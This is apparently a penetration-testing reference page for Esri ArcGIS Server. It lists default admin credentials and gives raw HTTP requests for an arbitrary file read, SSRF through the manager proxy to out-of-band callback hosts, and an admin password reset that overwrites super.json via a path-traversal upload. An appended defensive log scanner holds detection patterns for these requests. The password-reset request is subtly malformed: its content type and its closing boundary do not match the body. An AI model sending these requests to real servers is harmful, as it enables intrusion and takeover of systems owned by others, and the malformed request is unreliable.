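Introduction
ArcGIS is a family of geographic information system (GIS) software developed by Esri (Environmental Systems Research Institute), widely used for map production, spatial analysis, data management and visualization. ArcGIS provides a complete set of tools that help users collect, manage, analyze and present geographic information.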

Default information
- Port: 6080
- Admin console path: /arcgis/admin/
- Admin console password: siteadmin/siteadmin

Vulnerabilities
Arbitrary file read

```http
GET /arcgis/manager/3370/js/../WEB-INF/web.xml HTTP/1.0
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```

SSRF with response echo (1)

```http
GET /arcgis/manager/proxy/gwproxy.jsp?http://631c122b.10p.xyz/c HTTP/1.1
Host:
Cache-Control:max-age=0
Upgrade-Insecure-Requests:1
User-Agent:Mozilla/5.0 (Windows NT 10.0;Win64;x64)AppleWebKit/537.36 (KHTML,like Gecko)Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding:gzip,deflate
Accept-Language:zh-CN,zh;q=0.9
Connection:close
Content-Type:application/x-www-form-urlencoded
Content-Length:0
```

SSRF with response echo (2)

```http
POST /arcgis/manager/proxy/proxy.jsp?http://xxxxxxx.ceye.io/xxxx HTTP/1.1
Host:
Cache-Control:max-age=0
Upgrade-Insecure-Requests:1
User-Agent:Mozilla/5.0 (Windows NT 10.0;Win64;x64)AppleWebKit/537.36 (KHTML,like Gecko)Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding:gzip,deflate
Accept-Language:zh-CN,zh;q=0.9
Connection:close
Content-Type:application/x-www-form-urlencoded
Content-Length:0
```

Blind SSRF (no response echo)

```http
POST /arcgis/manager/proxy?http://xxxxxxx.ceye.io/xxxx HTTP/1.1
Host:
Cache-Control:max-age=0
Upgrade-Insecure-Requests:1
User-Agent:Mozilla/5.0 (Windows NT 10.0;Win64;x64)AppleWebKit/537.36 (KHTML,like Gecko)Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding:gzip,deflate
Accept-Language:zh-CN,zh;q=0.9
Connection:close
Content-Type:application/x-www-form-urlencoded
Content-Length:0
```

Administrator password reset

```http
POST /arcgis/rest/services/SampleWorldCities/FeatureServer/uploads/upload HTTP/1.1
Host:
Cache-Control:max-age=0
Upgrade-Insecure-Requests:1
User-Agent:Mozilla/5.0 (Windows NT 10.0;Win64;x64)AppleWebKit/537.36 (KHTML,like Gecko)Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding:gzip,deflate
Accept-Language:zh-CN,zh;q=0.9
Connection:close
Content-Type:application/x-www-form-urlencoded
Content-Length:0

------WebKitFormBoundary7s4MP8qFuXMFGC59
Content-Disposition:form-data;name="file"; filename="../../../../../../config-store/security/super/super.json"
Content-Type:image/png

{
"username":"siteadmin1",
"password":"uPwWtXKOCTk=",
"disabled":false,
"lockoutInfo":{
"consecutiveLogonFailureAttempts":1,
"firstLogonFailureTime":1690342933617,
"lockedUntilTime":0
}
}
-----WebKitFormBoundary7s4MP8qFuXMFGC59
Content-Disposition:form-data;name="description"

------WebKitFormBoundary7s4MP8qFuXMFGC59
Content-Disposition:form-data;name="f"

html
------WebkitFormBoundary7s4MP8qFuXMFGcso--
```
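
For defenders, the request shapes listed above can be searched for in web or reverse-proxy access logs. The following is an added example, not part of the original page or of Esri's tooling: it assumes combined-log-format lines, and the rule names, sample log lines and hosts are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Rules derived from the request lines shown on this page (names are hypothetical).
RULES = [
    # "../" inside the path of the manager webapp (arbitrary file read)
    ("manager-path-traversal",
     re.compile(r"^/arcgis/manager/[^?]*\.\.[/\\]", re.I)),
    # absolute URL passed as the query string of a manager proxy endpoint (SSRF)
    ("manager-proxy-ssrf",
     re.compile(r"^/arcgis/manager/proxy(?:/(?:gw)?proxy\.jsp)?\?https?://", re.I)),
    # upload endpoint used to overwrite super.json; legitimate uploads also hit
    # this path, so a match means "review the request body", not "confirmed"
    ("featureserver-upload",
     re.compile(r"^/arcgis/rest/services/.+/FeatureServer/uploads/upload", re.I)),
]

# Assumed log layout: the request is logged as "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def classify(line):
    """Return the names of all rules that the logged request target matches."""
    m = REQUEST.search(line)
    if not m:
        return []
    target = m.group("target")
    for _ in range(3):  # undo single and double percent-encoding
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return [name for name, rx in RULES if rx.search(target)]

def scan(lines):
    """Return (line_number, matched_rules) for every suspicious line."""
    hits = [(n, classify(line)) for n, line in enumerate(lines, 1)]
    return [(n, rules) for n, rules in hits if rules]

# Constructed sample log lines (documentation addresses, placeholder hosts)
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /arcgis/manager/3370/js/../WEB-INF/web.xml HTTP/1.0" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /arcgis/manager/proxy/gwproxy.jsp?http://callback.example/c HTTP/1.1" 200 12',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "POST /arcgis/manager/proxy?http%3A%2F%2Fcallback.example%2Fx HTTP/1.1" 200 0',
    '203.0.113.9 - - [01/Jan/2024:10:02:00 +0000] "POST /arcgis/rest/services/SampleWorldCities/FeatureServer/uploads/upload HTTP/1.1" 200 88',
    '203.0.113.9 - - [01/Jan/2024:10:03:00 +0000] "GET /arcgis/rest/services?f=json HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for n, rules in scan(SAMPLE_LOG):
        print(n, ",".join(rules))
```

Some servers and proxies normalize `../` before logging, so the traversal rule is most reliable on logs taken in front of the application server. The traversal `filename` of the password-reset request sits in the multipart body and is only visible where request bodies are captured.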